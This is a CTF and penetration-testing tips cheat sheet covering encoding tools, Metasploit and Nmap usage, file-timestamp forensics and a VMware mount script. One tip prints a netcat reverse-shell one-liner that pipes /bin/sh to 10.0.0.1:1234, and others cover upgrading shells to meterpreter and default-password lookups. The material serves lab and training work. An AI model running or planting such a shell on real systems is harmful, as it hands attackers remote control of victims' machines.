General tips
General CTF data analysis (encoding, hash identifier, etc.)
https://gchq.github.io/CyberChef/
Disposable email
If you are signing up for a lot of accounts you can use a disposable email. You just enter the address you want at that moment, and then you can read its inbox. But remember, so can everyone else.
https://www.mailinator.com
Base64 encode/decode
import base64
# b64encode takes bytes, so encode the string first (Python 3)
encoded = base64.b64encode("String to encode".encode())
print(encoded)
# b64decode returns bytes; "aGVqc2Fu" decodes to b'hejsan'
decoded = base64.b64decode("aGVqc2Fu")
print(decoded)
Quick Base64 Decoder
echo aGVsbG8gd2hpdGUgaGF0Cg== | base64 -d
Metasploit Slow Search Fix
db_rebuild_cache
Default passwords
http://www.defaultpassword.com/
Getting GUI on machine that does not have RDP or VNC
You can forward X over SSH.
http://www.vanemery.com/Linux/XoverSSH/X-over-SSH2.html
Metasploit shell upgrade
In the Metasploit framework, if we have a plain shell, we can upgrade it to meterpreter with sessions -u (also worth trying when the shell dies as soon as you interact with it, which happened in a VM):
sessions -h
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-u <opt> Upgrade a shell to a meterpreter session on many platforms
Using a list in a metasploit module that does not allow it
In the RHOSTS field enter:
file://PATHTOIPADDRESSES
Change Nmap modes while scanning
v --increase verbosity
p --turn on packet tracing
Nmap host enumeration
-sn --determine alive hosts
Issues with Exploits (try viewing in Burp)
Options -> Add (Proxy Listeners) ->
Bind to port (i.e. local port to bind) (e.g. 8500) ->
Request Handling ->
Redirect to host (i.e. IP of target) ->
Redirect to port (i.e. port of target) (e.g. 8500)
then browser
localhost:8500
or run the exploit again
Quick determination if executables exist
which nc
Make sure shells don't hang (send to background)
If adding a reverse shell to a web console, for example, append "&" to the end of the command to send it to the background,
so that the console does not block if any process hangs during interaction.
For example:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f &
Modification of Files (CTF specific / IR trick)
Look for other files modified around the time of the initial flag file or other indicator:
find / -type f -newermt 2017-08-20 ! -newermt 2017-08-24 2>/dev/null
Note: 2>/dev/null hides all the permission denied error messages.
In the example above the user flag was uploaded Aug 22 2017, so the window brackets that date.
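As an added example (not part of the original notes), the same window check in Python, assuming a Linux box: it lists what find -newermt would, and additionally flags files whose ctime falls in the window while their mtime does not, which is what a file looks like after its mtime was rewritten with touch -t or utime().

```python
import os
import tempfile
from datetime import datetime, timedelta, timezone

def files_changed_in_window(root, start, end):
    """Report files under `root` whose timestamps fall in [start, end).
    mtime in window: what `find -newermt A ! -newermt B` lists.
    ctime in window but mtime outside: utime()/`touch -t` rewrote mtime, but the
    kernel always sets ctime to the real clock, so this suggests timestomping.
    Returns [(path, mtime, ctime, note)] sorted by mtime."""
    lo, hi = start.timestamp(), end.timestamp()
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path, follow_symlinks=False)
            except OSError:  # unreadable or vanished: the 2>/dev/null case
                continue
            if lo <= st.st_mtime < hi:
                hits.append((path, st.st_mtime, st.st_ctime, "modified in window"))
            elif lo <= st.st_ctime < hi:
                hits.append((path, st.st_mtime, st.st_ctime,
                             "ctime in window, mtime outside: possible timestomp"))
    hits.sort(key=lambda h: h[1])
    return hits

def demo():
    """Constructed sample: a fresh file plus one whose mtime was pushed back to
    2017-08-22 (the flag-upload date above) with os.utime. Returns
    {filename: note} for a one-minute window around 'now'."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "fresh.txt"), "w") as f:
        f.write("written now\n")
    stomped = os.path.join(root, "stomped.txt")
    with open(stomped, "w") as f:
        f.write("mtime rewritten to 2017\n")
    old = datetime(2017, 8, 22, tzinfo=timezone.utc).timestamp()
    os.utime(stomped, (old, old))
    now = datetime.now(timezone.utc)
    hits = files_changed_in_window(root, now - timedelta(minutes=1),
                                   now + timedelta(minutes=1))
    return {os.path.basename(p): note for p, _m, _c, note in hits}
```

Run demo() to see the two classifications; on a real box point files_changed_in_window at / with the dates from the find command above.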
Remove white space from a file
In order to wipe all whitespace including newlines you can try:
cat file.txt | tr -d " \t\n\r"
You can also use the character classes defined by tr
cat file.txt | tr -d "[:space:]"
For example, in order to wipe just horizontal white space:
cat file.txt | tr -d "[:blank:]"
Mounting a folder share from Windows host to VM
root@kali:~/Desktop# cat mount-shared-folders.sh
#!/bin/bash
vmware-hgfsclient | while read folder; do
echo "[i] Mounting ${folder} (/mnt/hgfs/${folder})"
mkdir -p "/mnt/hgfs/${folder}"
umount -f "/mnt/hgfs/${folder}" 2>/dev/null
vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "/mnt/hgfs/${folder}"
done
sleep 2s